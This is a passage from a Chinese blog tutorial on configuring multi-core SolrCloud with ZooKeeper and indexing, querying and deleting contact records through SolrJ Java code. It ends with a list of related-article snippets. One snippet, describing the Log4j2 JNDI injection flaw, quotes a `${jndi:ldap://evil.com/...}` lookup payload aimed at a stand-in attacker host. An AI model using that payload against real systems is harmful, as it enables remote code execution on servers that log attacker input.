   <field name="all" type="text_ik" indexed="true" stored="false" />
   <copyField source="name" dest="all"/>
   <copyField source="address" dest="all" />
   <copyField source="phone" dest="all" />
   <field name="_version_" type="long" indexed="true" stored="true"/>
 </fields>
 <uniqueKey>id</uniqueKey>
  <types>
    <fieldType name="string" class="solr.StrField" sortMissingLast="true" />
    <fieldType name="long" class="solr.TrieLongField" precisionStep="0" positionIncrementGap="0"/>
    <fieldType name="text" class="solr.TextField" />
    <fieldType name="text_ik" class="solr.TextField">
      <analyzer class="org.wltea.analyzer.lucene.IKAnalyzer"/>
    </fieldType>
 </types>
</schema>

YellowPages的实例已经配置完成.现在开始配置多核的SolrCloud,在使用多核的SolrCloud的时候.我们不再使用编写tomcat的文件的方式来指定zookeeper来上传文件.而是指定Solr的工作目录即可.这里需要用到solr自带的工具.先用example自带的包来解压运行一下solr.以生成需要的配置文件

[root@localhost example]# java -jar start.jar

进入cloud-scripts目录

[root@localhost cloud-scripts]# ./zkcli.sh -zkhost 192.168.39.250:2281 -cmd bootstrap -solrhome /usr/local/solrTest/testData/

上传Solr的根目录 Solr在加载的时候会依据根目录内的多个集合的属性来初始化配置文件
修改Tomcat的文件,仅仅指定Shard的数量 ZK的机器以及服务的端口 

[root@localhost bin]# vi catalina.sh
JAVA_OPTS="$JAVA_OPTS -DnumShards=2 -DzkHost=192.168.39.250:2281 -Djetty.port=8080"

将配置好的YellowPages的实例复制到其他的机器上.由于其他机器的catalina.sh没有变动.则不用修改
先后启动250,251,252 即可看到

6.2 SolrJ操作SolrCloud

SolrJ操作Solr和操作SolrCould并没有太多的区别.这里就以SolrCould为例子来说明.SolrJ操作的时候和上面说的URL的方式也非常的类似.提供的功能也很相像,也就是索引方面的添加,删除,更新,提交和优化.但是默认情况下只要索引中有这条记录,就会覆盖原有的.标记是否存在索引记录的字段就是唯一字段,一般是(ID).

搭建环境.

新建一个项目,并且Copy必须的包到项目内.

solr-solrj-4.4.0.jar      Solr对Java的接口类
solr-core-4.4.0.jar     Solr的核心包
solrj-lib/zookeeper-3.4.5.jar   zookeeper的工具包
//httpClient的组件,用于网络请求(HTTP POST GET)
solrj-lib/commons-io-2.1.jar
solrj-lib/httpclient-4.2.3.jar
solrj-lib/httpcore-4.2.2.jar
solrj-lib/httpmime-4.2.3.jar
//日志包
solrj-lib/jcl-over-slf4j-1.6.6.jar
solrj-lib/jul-to-slf4j-1.6.6.jar
solrj-lib/log4j-1.2.16.jar
solrj-lib/slf4j-api-1.6.6.jar
solrj-lib/slf4j-log4j12-1.6.6.jar
//杂项
solrj-lib/noggit-0.5.jar
solrj-lib/wstx-asl-3.2.7.jar

数据文件

京翰1对1辅导 中小学课外辅导专家
北京京翰英才教育科技有限公司
4008116268-2880

提高记忆力3-5倍,让学习更轻松、快乐、高效
新脑力教育
13965121806 

合肥博强教育管理咨询有限公司
合肥刘博士数理化一对一、精品小班、艺术生文化课快速提分
4008806400

尚助教育辅导中心
合肥宁国路
13966662351

新脑力教育
合肥天鹅湖
13965121809

实例代码

    IndexAPI.java

    package com.iflytek.test.solr.core;

    import java.io.IOException;

    import org.apache.solr.client.solrj.SolrServerException;
    import org.apache.solr.client.solrj.impl.CloudSolrServer;
    import org.apache.solr.client.solrj.response.QueryResponse;
    import org.apache.solr.common.SolrDocumentList;
    import org.apache.solr.common.SolrInputDocument;
    import org.apache.solr.common.params.ModifiableSolrParams;

    import com.iflytek.test.solr.conf.Constent;
    import com.iflytek.test.solr.data.ContactInfo;

    public class IndexAPI {

      private CloudSolrServer server = null;

      /**
       * 添加索引
       * */
      public boolean addIndex(ContactInfo info){

        //如果不是SolrCloud 则类似下面的写法
        //HttpSolrServer server = new HttpSolrServer("http://localhost:8983/solr");

        try{
          if(server==null){
            server = new CloudSolrServer(Constent.ZKHOST);
            server.setDefaultCollection(Constent.COLLECTION);
          }
        }catch(Exception e){
          //日志
          return false;
        }

        SolrInputDocument doc = new SolrInputDocument();
        doc.addField("id", info.get_id());
        doc.addField("name", info.getName());
        doc.addField("address", info.getAddress());
        doc.addField("phone", info.getPhone());
        try {
          server.add(doc);
          server.commit();
          //也可以选择不提交等后期一起提交
          server.optimize();
          //索引优化 也不是必须的
        } catch (SolrServerException e) {
          //日志
          return false;
        } catch (IOException e) {
          //日志
          return false;
        }

        return true;
      }

      /**
       * 查询索引
       * @param q 查询条件 具体的构建过程交给外部去做
       * */
      public SolrDocumentList searchIndex(String q){

        //如果不是SolrCloud 则类似下面的写法
        //HttpSolrServer server = new HttpSolrServer("http://localhost:8983/solr");

        try{
          if(server==null){
            server = new CloudSolrServer(Constent.ZKHOST);
            server.setDefaultCollection(Constent.COLLECTION);
          }
        }catch(Exception e){
          //日志
          return null;
        }

        ModifiableSolrParams params = new ModifiableSolrParams();
        params.set("q", q);
        params.set("start", 0);
        params.set("row", 10);
        //这里实际上就是请求的URL的拼接过程

        QueryResponse response = null;
        try {
          response = server.query(params);
        } catch (SolrServerException e) {
          // TODO Auto-generated catch block
          e.printStackTrace();
        }
        SolrDocumentList results = response.getResults();
        return results;
      }

      /**
       * 按查询结果删除索引.还支持按ID删除,批量删除等.
       * @param q 要删除的查询语句
       * */
      public boolean delIndex(String q){

        //如果不是SolrCloud 则类似下面的写法
        //HttpSolrServer server = new HttpSolrServer("http://localhost:8983/solr");

        try{
          if(server==null){
            server = new CloudSolrServer(Constent.ZKHOST);
            server.setDefaultCollection(Constent.COLLECTION);
          }
        }catch(Exception e){
          return false;
        }
        try {
          server.deleteByQuery(q);
          server.commit();
        } catch (SolrServerException e) {
          return false;
        } catch (IOException e) {
          return false;
        }
        return true;
      }


    }

    CreateData.java

    package com.iflytek.test.solr.core.test;

    import gg.mine.tools.io.local.ReadFileByLine;

    import java.util.ArrayList;
    import java.util.LinkedList;
    import java.util.List;

    import com.iflytek.test.solr.core.IndexAPI;
    import com.iflytek.test.solr.data.ContactInfo;

    public class CreateData {

      /**
       * 读取文件并转换为联系人列表
       * @param file 文件名
       * @return 返回联系人的List
       * */
      private static List<ContactInfo> fileToDataList(String file){
        ArrayList<String> lines = ReadFileByLine.getAllLine2Array(file);
        List<ContactInfo> result = new LinkedList<ContactInfo>();
        for(int index=0;index<lines.size();index=index+3){
          ContactInfo instance = new ContactInfo();
          instance.setName(lines.get(index));
          instance.setAddress(lines.get(index+1));
          instance.addPhone(lines.get(index+2));

          result.add(instance);
        }
        return result;
      }


      public static void main(String []a){
        List<ContactInfo> list = fileToDataList("data/ContactInfo");
        if(list==null){
          return;
        }

        IndexAPI indexer = new IndexAPI();
        for(ContactInfo info:list){
          if(indexer.addIndex(info)){
            System.out.println("添加成功!");
          }else{
            System.err.println("添加失败!"+info.getName());
          }
        }

      }

    }

添加后访问 http://192.168.39.250:8080/solr/YellowPages/select?q=%3A&wt=json&indent=true 即可看到添加成功

    SearchIndex.java 

    package com.iflytek.test.solr.core.test;

    import org.apache.solr.common.SolrDocument;
    import org.apache.solr.common.SolrDocumentList;

    import com.iflytek.test.solr.core.IndexAPI;

    public class SearchIndex {


      private static void printDocument(String q,SolrDocumentList list){

        System.out.println("查询语句: "+q+"\n\n");

        if(list==null){
          return;
        }
        for(SolrDocument cur:list){
          System.out.println("名字 "+cur.getFieldValue("name"));
          System.out.println("地址 "+cur.getFieldValue("address"));
          System.out.println("电话 "+cur.getFieldValue("phone"));
          System.out.println();
        }
      }

      public static void main(String []a){

        IndexAPI indexer = new IndexAPI();
        String q = "all:合肥的数理化辅导班";
        SolrDocumentList list = indexer.searchIndex(q);
        printDocument(q,list);

        q = "all:北京的辅导班";
        list = indexer.searchIndex(q);
        printDocument(q,list);


        q = "all:13965121809是谁的电话";
        list = indexer.searchIndex(q);
        printDocument(q,list);

      }

    }

运行结果

查询语句: all:合肥的数理化辅导班

名字合肥博强教育管理咨询有限公司
地址合肥刘博士数理化一对一、精品小班、艺术生文化课快速提分
电话 [4008806400]

名字尚助教育辅导中心
地址合肥宁国路
电话 [13966662351]

名字新脑力教育
地址合肥天鹅湖
电话 [13965121809]

名字京翰1对1辅导中小学课外辅导专家
地址北京京翰英才教育科技有限公司
电话 [4008116268-2880]

查询语句: all:北京的辅导班

名字尚助教育辅导中心
地址合肥宁国路
电话 [13966662351]

名字京翰1对1辅导中小学课外辅导专家
地址北京京翰英才教育科技有限公司
电话 [4008116268-2880]

查询语句: all:13965121809是谁的电话

名字新脑力教育
地址合肥天鹅湖
电话 [13965121809]

package com.iflytek.test.solr.core.test;

import com.iflytek.test.solr.core.IndexAPI;

public class DelIndex {

  public static void main(String []a){

    IndexAPI indexer = new IndexAPI();
    indexer.delIndex("id:2212087180485603235");

    /**
     *{
          "id": "2212087180485603235",
          "name": "提高记忆力3-5倍,让学习更轻松、快乐、高效",
          "address": "新脑力教育",
          "phone": [
            "13965121806\t"
          ],
          "_version_": 1447136747670470700
        },
     * 
     * */
  }

}

注意:在真实环境中没有必要每个请求都commit 和 optimize,这两个操作都是比较耗时的.具体可以依据生产环境来决定多长时间commit一次

7 Solr管理

Solr在搭建成功后会提供一个管理页面.也就是上面截图中看到的

包括

Dashboard   仪表盘,可以看到系统的运行状态,JVM参数等
Logging   系统日志.可以看到警告,提示信息.
Logging/Level 对日志级别的设置.即上面级别的日志可以被记录Log
Cloud /Graph  云监控平台,可以看到有哪些Collection部署在哪些机器上,及分片和主从的信息
Cloud/Tree  配置文件的树信息
Cloud/dump  JSON格式返回服务器的状态信息
Core Admin  核心(Collection)的配置信息
JavaProperties  Java的运行参数
Thread  线程的堆栈信息

集合页面
OverView  运行信息.可以在这个页面上优化索引
Analysis  分词界面.可以测试分词效果
Config  显示配置文件SolrConfig.xml
Document  追加/修改文档
plugins 显示加载的插件及插件状态
Query   查询页面
Replication 是否已经数据备份
Schema  字段信息schema.xml
SchemaBrowser 以UI查看字段和类型信息

你可能感兴趣的:(Solr)

分布式搜索引擎Elasticsearch——基础敲代码的旺财架构进阶 elasticsearch java 搜索引擎 ES-head
文章目录一、Lucene与Solr与Elasticsearch二、ES核心术语三、ES核心概念四、倒排索引五、ES的安装（centos7）1、下载地址（这里安装linux版本）2、解压压缩包3、修改配置文件(1)修改核心配置文件(2)修改JVM配置文件4、启动ES(1)添加系统用户并授权(2)ES启动(3)修改配置文件(4)再次启动ES六、安装ES-head插件（可视化管理插件）1、使用谷歌市场安
Java高级技术day75：Zookeeper与Dubbo 开源oo柒
一、Zookeeper的介绍1.Zookeeper介绍：顾名思义zookeeper就是动物园管理员，他是用来管hadoop（大象）、Hive(蜜蜂)、pig(小猪)的管理员，ApacheHbase和ApacheSolr的分布式集群都用到了zookeeper；Zookeeper:是一个分布式的、开源的程序协调服务，是hadoop项目下的一个子项目。他提供的主要功能包括：配置管理、名字服务、分布式锁、
Elasticsearch详解es 思静语 elasticsearch elasticsearch 大数据搜索引擎
文章目录概述es架构为什么要使用ElasticSearchElasticSearch的优势使用场景es为什么这么快倒排索引如何保证ES和数据库的数据一致性监听binlog同步双写elasticsearch是如何实现master选举的Elasticsearch与Solr的区别概述ES全称是ElasticSearch，它是一个建立在全文搜索引擎库Lucene基础上的开源搜索和分析引擎。ES它本身具有分
08、全文检索 -- Solr -- 使用 SolrClient 连接 Solr（演示手动配置自定义的SolrClient 并在测试类使用 solrClient 进行添加、查询、删除文档的操作） _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr lucene
目录SolrClientSolrClient的功能SolrClient这个API包含如下常用方法：SolrClient方法的说明：SpringBootStarterDataSolr的不足手动配置自定义的SolrClientSolrClient代码演示配置自定义的SolrClient1、创建一个SpringBoot项目，添加依赖2、SolrAutoConfiguration解析3、手动配置自定义的S
java 商城全文搜索_利用solr实现商品的搜索功能闲侃数码 java 商城全文搜索
后期补充：为什么要用solr服务，为什么要用luncence？问题提出：当我们访问购物网站的时候，我们可以根据我们随意所想的内容输入关键字就可以查询出相关的内容，这是怎么做到呢？这些随意的数据不可能是根据数据库的字段查询的，那是怎么查询出来的呢，为什么千奇百怪的关键字都可以查询出来呢？答案就是全文检索工具的实现，luncence采用了词元匹配和切分词。举个例子：北京天安门------luncenc
solr7集群 springboot_springboot 集成solr 骑lv上高速 solr7集群 springboot
一、版本介绍：jdk1.8tomcat8springboot2.1.3RELEASE(这里有坑,详见下文)solr7.4.0(没有选择最新的版本,是因为项目的boot版本是2.1.3,其对应的solr-solrj.jar版本是7.4.0，为避免出现不可预料不可抗拒不可解决的问题，谨慎选用与之一样版本)二、solr服务器搭建下载1.tomcat8的下载不赘述；2.solr下载：进入solr官网，找历
09、全文检索 -- Solr -- SpringBoot 整合 Spring Data Solr （生成DAO组件和实现自定义查询方法） _L_J_H_ #全文检索（Solr 和 Elasticsearch）spring 全文检索 solr
目录SpringBoot整合SpringDataSolrSpringDataSolr的功能（生成DAO组件）：SpringDataSolr大致包括如下几方面功能：@Query查询（属于半自动）代码演示：1、演示通过dao组件来保存文档1、实体类指定索引库2、修改日志级别3、创建Dao接口4、先删除所有文档5、创建测试类6、演示结果2、根据title_cn字段是否包含关键字来查询3、查询指定价格范围
vulhub中Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）余生有个小酒馆 vulhub漏洞复现 apache log4j 安全
ApacheLog4j2是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入，执行任意代码。1.服务启动后，访问`http://your-ip:8983`即可查看到ApacheSolr的后台页面。2.`$
solr —— 1 全文检索Solr8.0第一部分苏打饼干没加心 solr
solr，毕设啊，快被写完吧1solr介绍什么是solrLucene与Solr与ES为什么要用slor2HelloWorld2.1项目安装部署2.2项目安装配置创建核心创建document(表)添加文件查询数据3solr后台管理页面详解控制面板5全文检索千万级别数据实战，全面剖析架构设计，大数据瓶颈突破6数据库导入索引BV1Dt411G7eF1solr介绍什么是solrsolr简化了程序员的操作L
（三十七）大数据实战——Solr服务的部署安装厉害哥哥吖大数据大数据 solr
前言Solr是一个基于ApacheLucene的开源搜索平台，它提供了强大的全文搜索、分布式搜索和数据分析功能。Solr可以用于构建高性能的搜索应用程序，支持从海量数据中快速检索和分析信息。Solr使用倒排索引和先进的搜索算法，可实现快速而准确的全文搜索。Solr可以在多个服务器上进行水平扩展，实现分布式搜索和负载均衡。Solr支持复杂的过滤、排序和范围查询，使您可以根据各种条件对搜索结果进行精确
ElasticSearch VS. Solr VS. Sphinx：最好的开源搜索引擎比较 chenxiyy3773 大数据人工智能数据库
译者按：本文是来自一家乌克兰技术公司的文章。该文章译者认为着重在应用上，而非单纯的性能对比。给自己的平台选择一个合适的搜索引擎比任何一个吹嘘技术强大的好。虽然最近一两年ES发展飞速，但sphinx的简单易用性还是赢得很多机构公司的青睐，比如优酷土豆都是用sphinx。所以使用之前，务必先了解自己的业务诉求，再选择合适的搜索引擎，而非一昧跟风。翻译若有误请指正，谢谢查看！编译自：ELASTICSEA
阿里P8架构师谈：开源搜索引擎Lucene、Solr、Sphinx等优劣势比较 liuhuiteng 中间件中间件
开源搜索引擎分类1.Lucene系搜索引擎，java开发,包括：LuceneSolrElasticsearchKatta、Compass等都是基于Lucene封装。你可以想象Lucene系有多强大。2.Sphinx搜素引擎，c++开发,简单高性能。以下重点介绍最常用的开源搜素引擎：Lucene、Solr、Elasticsearch、Sphinx的特点和优劣势选型比较。Lucene1.Lucene简
使用solr6.0搭建solrCloud 牛初九
使用solr6.0搭建solrCloud一、搭建zookeeper集群下载zookeeper压缩包到自己的目录并解压（本例中的目录在/opt下），zookeeper的根目录我们在这里用${ZK_HOME}表示。在${ZK_HOME}/conf下创建zoo.cfg文件，可以复制zoo_sample.cfg文件：cpzoo_sample.cfgzoo.cfg修改zoo.cfg的内容如下：vimzoo.
Error CREATEing SolrCore 'index': Unable to create core: index Caused by: No enum constant org.apach 杉斯狼后台 Java solr enum 索引 lucene
ErrorCREATEingSolrCore'index':Unabletocreatecore:indexCausedby:Noenumconstantorg.apache.lucene.util.Version.LUCENE_48出错原因：solr版本配置不正确解决方法：在索引文件的目录下conf>solrconfig.xml4.8将4.8修改为4.7（你具体的版本，可以参照collectio
solr 或查询 or query 杉斯狼 solr solr java web java lucene
MenuId:(472e44eaac735772ef44366OR80f24930dcf7131262d9OR51e8f9844f8bd1283ac)如上句，格式为key:(value1ORvalue2ORvalue3OR...)注意，OR必须为大写，同时两边各有一空格。
尚学堂102天总结+springdata-redis 人间草木为伴
102天行百里者半九十，想要在一个行业里成为顶尖人才，一定满足一万小时定律，要想学好JAVA，需要持之以恒不断地努力,每天都要勤思考+善于询问+解决问题!知识温故而知新>>>>>>Linux下安装solr的教程555.pngSpringBoot2.2以上版本添加junit进行测试的方法h111.pngMaven依赖中标签的作用image.png./的作用和用法image.png启动和关闭redis
开源大数据集群部署（九）Ranger审计日志集成（solr）大数据部署
作者：櫰木1、下载solr安装包并解压包tar-xzvfsolr-8.11.2.gzcdsolr-8.11.2执行安装脚本./bin/install_solr_service.sh/opt/solr-8.11.2.tgz安装后，会在/etc/default/下生成solr.in.sh文件。2、在rangeradmin下生成solr相关配置cd/opt/ranger-2.3.0-admin/cont
Lucene/Solr/Elasticsearch可视化工具luke的下载及使用景小悦 lucene luke elasticsearch solr
※※使用的luke版本一定与lucene一致，否则会出现问题。luke下载地址：https://github.com/DmitryKey/luke/releasesluke是一个用于Lucene/Solr/Elasticsearch搜索引擎，方便开发和诊断的GUI（可视化）工具。luke:Luke是查询LUCENE索引文件的工具，而且用Luke的Search可以做查询Lukeisahandydev
CVE-2017-12149漏洞复现黑客大佬漏洞复现 web安全安全网络 python
服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish漏洞复现中间件及框架列表：IIS，Apache，Nginx，Tomcat，Docker，Weblogic，JBoos，WebSphere，Jenkins，GlassFish，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等1、中间件-Web
【知识整理】技术新人的培养计划卢卡上学文心一言 AIGC 人工智能 php 技术团队新人培养 git
一、培养计划落地实操1.概要新人入职，要给予适当的指导，目标：1、熟悉当前环境：生活环境：吃饭、交通、住宿、娱乐工作环境：使用的工具，Mac、maven、git、idea等2、熟悉并掌握工作技能：技术栈：Spring、Hibernate、Cache、Solr、MySQL（根据公司内部技术使用调整）内部协作工具：wiki（Confluence）、task（JIRA）、git（Stash）快捷操作：M
Apache Log4j2漏洞复现（反弹shell）安全菜 apache
0x01漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，ApacheStruts2、ApacheSolr、ApacheDruid、Apa
2021最新版 ElasticSearch 7.6.1 教程详解爬虫jsoup+es模拟京东搜索（狂神说） Super_Song_ 中间件 elasticsearch 搜索引擎 java nosql
文章目录一、ElasticSearch简介1.了解创始人DougCutting2.Lucene简介3.ElasticSearch简介4.ElasticSearch和Solr的区别5.了解ELK二、软件安装1.ElasticSearch2.ElasticSearchHead3.Kibana三、ElasticSearch使用详解1.ES核心概念文档索引倒排索引ik分词器2.命令模式的使用Rest风格说
大数据用户画像系统架构设计充电了么
文章目录一、用户画像数据仓库搭建、数据抽取部分二、大数据平台、用户画像集市分层设计、处理三、离线计算部分四、实时计算部分五、Solr/ES搜索引擎部分六、JavaWeb毫秒级实时用户画像接口服务七、用户画像实时展示异步触发获取Web自助后台总结用户画像是一个非常通用普遍使用的系统，从我们的架构图中可以看出，从数据计算时效性上来讲分离线计算和实时计算。离线计算一般是每天晚上全量计算所有用户，或者按需
Apache Log4j2 漏洞原理仲瑿漏洞原理 apache log4j java
ApacheLog4j远程代码执行漏洞1.漏洞危害ApacheLog4j被发现存在一处任意代码执行漏洞，由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。经验证，ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等众多组件与大型应用均受影响2.影响版本ApacheLog4j2.x<=2.14.13.漏
rm: relocation error: /lib64/libc.so.6: symbol _dl_starting_up, version GLIBC_PRIVATE not defined in feifeidata
由于安装glibc-2.23.tar.gz导致系统出错，命令不能用恢复方法：进入/usr/lib64目录，使用ls-ltr命令ls-ltrlrwxrwxrwx.1rootroot2112月1421:46ld-linux-x86-64.so.2->/usr/lib64/ld-2.17.solrwxrwxrwx.1rootroot2312月1421:51libc.so.6->/usr/lib64/li
安全漏洞(1)-Log4j2远程代码执行漏洞，log4j2漏洞验证迷途的小兵安全体系_加解密算法安全 log4j2 安全漏洞
漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等均受影响。漏洞评级CVE-2021
揭秘Elasticsearch：一文读懂分布式搜索与分析引擎的核心概念超越不平凡 elasticsearch 分布式大数据
Elasticsearch是一个开源、分布式、实时搜索和分析引擎，专门用于处理大规模数据的快速检索与分析。它建立在ApacheLucene的基础上，但提供了比Lucene更为丰富的功能和友好的RESTfulAPI接口，使得开发者能够轻松地进行全文搜索、结构化搜索以及对海量数据进行复杂的聚合操作。Elasticsearch目前被广泛用于互联网多种领域中。一是搜索领域，相对于solr，成为很多搜索的不
07、全文检索 -- Solr -- Solr 全文检索之为索引库添加中文分词器 _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr 中文分词
目录Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词器的jar包2、修改managed-schema配置文件什么是fieldType3、添加停用词文档4、重启solr5、添加【*_cn】动态字段，并为该字段设置中文分词器6、演示分词器的区别演示text_cjk这个简单的分词器演示text_cn这个中文分词器Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词
全文检索服务器：Solr xiayehuimou solr solr 全文检索服务器
官网https://solr.apache.org/官方文档https://solr.apache.org/guide/solr/latest/deployment-guide/solrj.html1.介绍Solr是一个高性能，采用Java开发，基于Lucene的开源全文搜索服务器不仅限于搜索，Solr也可以用于存储目的。像其他NoSQL数据库一样，它是一种非关系数据存储和处理技术。solr需要运
php solr 全文检索引擎,【搜索引擎】Solr Suggester 实现全文检索功能-分词和和自动提示... 一十马 php solr 全文检索引擎
功能需求全文检索搜索引擎都会有这样一个功能：输入一个字符便自动提示出可选的短语：要实现这种功能，可以利用solr的SuggestComponent，SuggestComponent这种方法利用Lucene的Suggester实现，并支持Lucene中可用的所有查找实现。实现1.配置managed-schema文件配置自己core文件夹conf下的managed-schema文件这个是自己的字段：新
PHP，安卓，UI，java，linux视频教程合集 cocos2d-x小菜 java UI PHP android linux
╔-----------------------------------╗┆
各表中的列名必须唯一。在表 'dbo.XXX' 中多次指定了列名 'XXX'。 bozch .net .net mvc
在.net mvc5中，在执行某一操作的时候，出现了如下错误：各表中的列名必须唯一。在表 'dbo.XXX' 中多次指定了列名 'XXX'。经查询当前的操作与错误内容无关，经过对错误信息的排查发现，事故出现在数据库迁移上。回想过去：在迁移之前已经对数据库进行了添加字段操作，再次进行迁移插入XXX字段的时候，就会提示如上错误。 &
Java 对象大小的计算 e200702084 java
Java对象的大小如何计算一个对象的大小呢？
Mybatis Spring 171815164 mybatis
ApplicationContext ac = new ClassPathXmlApplicationContext("applicationContext.xml"); CustomerService userService = (CustomerService) ac.getBean("customerService"); Customer cust
JVM 不稳定参数 g21121 jvm
-XX 参数被称为不稳定参数，之所以这么叫是因为此类参数的设置很容易引起JVM 性能上的差异，使JVM 存在极大的不稳定性。当然这是在非合理设置的前提下，如果此类参数设置合理讲大大提高JVM 的性能及稳定性。可以说“不稳定参数”
用户自动登录网站永夜-极光用户
1.目标:实现用户登录后,再次登录就自动登录,无需用户名和密码 2.思路:将用户的信息保存为cookie 每次用户访问网站,通过filter拦截所有请求,在filter中读取所有的cookie,如果找到了保存登录信息的cookie,那么在cookie中读取登录信息,然后直接
centos7 安装后失去win7的引导记录程序员是怎么炼成的操作系统
1.使用root身份(必须)打开 /boot/grub2/grub.cfg 2.找到 ### BEGIN /etc/grub.d/30_os-prober ### 在后面添加 menuentry "Windows 7 (loader) (on /dev/sda1)" {
Oracle 10g 官方中文安装帮助文档以及Oracle官方中文教程文档下载 aijuans oracle
Oracle 10g 官方中文安装帮助文档下载：http://download.csdn.net/tag/Oracle%E4%B8%AD%E6%96%87API%EF%BC%8COracle%E4%B8%AD%E6%96%87%E6%96%87%E6%A1%A3%EF%BC%8Coracle%E5%AD%A6%E4%B9%A0%E6%96%87%E6%A1%A3 Oracle 10g 官方中文教程
JavaEE开源快速开发平台G4Studio_V3.2发布了無為子 AOP oracle mysql javaee G4Studio
我非常高兴地宣布,今天我们最新的JavaEE开源快速开发平台G4Studio_V3.2版本已经正式发布。大家可以通过如下地址下载。访问G4Studio网站 http://www.g4it.org G4Studio_V3.2版本变更日志功能新增 (1).新增了系统右下角滑出提示窗口功能。 (2).新增了文件资源的Zip压缩和解压缩
Oracle常用的单行函数应用技巧总结百合不是茶日期函数转换函数(核心)数字函数通用函数(核心)字符函数
单行函数; 字符函数,数字函数,日期函数,转换函数(核心),通用函数(核心) 一:字符函数: .UPPER(字符串) 将字符串转为大写 .LOWER (字符串) 将字符串转为小写 .INITCAP(字符串) 将首字母大写 .LENGTH (字符串) 字符串的长度 .REPLACE(字符串,'A','_') 将字符串字符A转换成_
Mockito异常测试实例 bijian1013 java 单元测试 mockito
Mockito异常测试实例： package com.bijian.study; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; import org.junit.Assert; import org.junit.Test; import org.mockito.
GA与量子恒道统计 Bill_chen JavaScript 浏览器百度 Google 防火墙
前一阵子，统计**网址时，Google Analytics（GA）和量子恒道统计（也称量子统计），数据有较大的偏差，仔细找相关资料研究了下，总结如下：为何GA和量子网站统计（量子统计前身为雅虎统计）结果不同？首先：没有一种网站统计工具能保证百分之百的准确出现该问题可能有以下几个原因：（1）不同的统计分析系统的算法机制不同；（2）统计代码放置的位置和前后
【Linux命令三】Top命令 bit1129 linux命令
Linux的Top命令类似于Windows的任务管理器，可以查看当前系统的运行情况，包括CPU、内存的使用情况等。如下是一个Top命令的执行结果： top - 21:22:04 up 1 day, 23:49, 1 user, load average: 1.10, 1.66, 1.99 Tasks: 202 total, 4 running, 198 sl
spring四种依赖注入方式白糖_ spring
平常的java开发中，程序员在某个类中需要依赖其它类的方法，则通常是new一个依赖类再调用类实例的方法，这种开发存在的问题是new的类实例不好统一管理，spring提出了依赖注入的思想，即依赖类不由程序员实例化，而是通过spring容器帮我们new指定实例并且将实例注入到需要该对象的类中。依赖注入的另一种说法是“控制反转”，通俗的理解是：平常我们new一个实例，这个实例的控制权是我
angular.injector boyitech AngularJS AngularJS API
angular.injector 描述: 创建一个injector对象, 调用injector对象的方法可以获得angular的service, 或者用来做依赖注入. 使用方法: angular.injector(modules, [strictDi]) 参数详解: Param Type Details mod
java-同步访问一个数组Integer[10]，生产者不断地往数组放入整数1000，数组满时等待；消费者不断地将数组里面的数置零，数组空时等待 bylijinnan Integer
public class PC { /** * 题目：生产者-消费者。 * 同步访问一个数组Integer[10]，生产者不断地往数组放入整数1000，数组满时等待；消费者不断地将数组里面的数置零，数组空时等待。 */ private static final Integer[] val=new Integer[10]; private static
使用Struts2.2.1配置 Chen.H apache spring Web xml struts
Struts2.2.1 需要如下 jar包: commons-fileupload-1.2.1.jar commons-io-1.3.2.jar commons-logging-1.0.4.jar freemarker-2.3.16.jar javassist-3.7.ga.jar ognl-3.0.jar spring.jar struts2-core-2.2.1.jar struts2-sp
[职业与教育]青春之歌 comsci 教育
每个人都有自己的青春之歌............但是我要说的却不是青春... 大家如果在自己的职业生涯没有给自己以后创业留一点点机会,仅仅凭学历和人脉关系,是难以在竞争激烈的市场中生存下去的.... &nbs
oracle连接(join)中使用using关键字 daizj JOIN oracle sql using
在oracle连接(join)中使用using关键字 34. View the Exhibit and examine the structure of the ORDERS and ORDER_ITEMS tables. Evaluate the following SQL statement: SELECT oi.order_id, product_id, order_date FRO
NIO示例 daysinsun nio
NIO服务端代码： public class NIOServer { private Selector selector; public void startServer(int port) throws IOException { ServerSocketChannel serverChannel = ServerSocketChannel.open(
C语言学习homework1 dcj3sjt126com c homework
0、课堂练习做完 1、使用sizeof计算出你所知道的所有的类型占用的空间。 int x; sizeof(x); sizeof(int); # include <stdio.h> int main(void) { int x1; char x2; double x3; float x4; printf(&quo
select in order by , mysql排序 dcj3sjt126com mysql
If i select like this: SELECT id FROM users WHERE id IN(3,4,8,1); This by default will select users in this order 1,3,4,8, I would like to select them in the same order that i put IN() values so:
页面校验-新建项目 fanxiaolong 页面校验
$(document).ready( function() { var flag = true; $('#changeform').submit(function() { var projectScValNull = true; var s =""; var parent_id = $("#parent_id").v
Ehcache（02）——ehcache.xml简介 234390216 ehcache ehcache.xml 简介
ehcache.xml简介 ehcache.xml文件是用来定义Ehcache的配置信息的，更准确的来说它是定义CacheManager的配置信息的。根据之前我们在《Ehcache简介》一文中对CacheManager的介绍我们知道一切Ehcache的应用都是从CacheManager开始的。在不指定配置信
junit 4.11中三个新功能 jackyrong java
junit 4.11中两个新增的功能，首先是注解中可以参数化，比如 import static org.junit.Assert.assertEquals; import java.util.Arrays; import org.junit.Test; import org.junit.runner.RunWith; import org.junit.runn
国外程序员爱用苹果Mac电脑的10大理由 php教程分享 windows PHP unix Microsoft perl
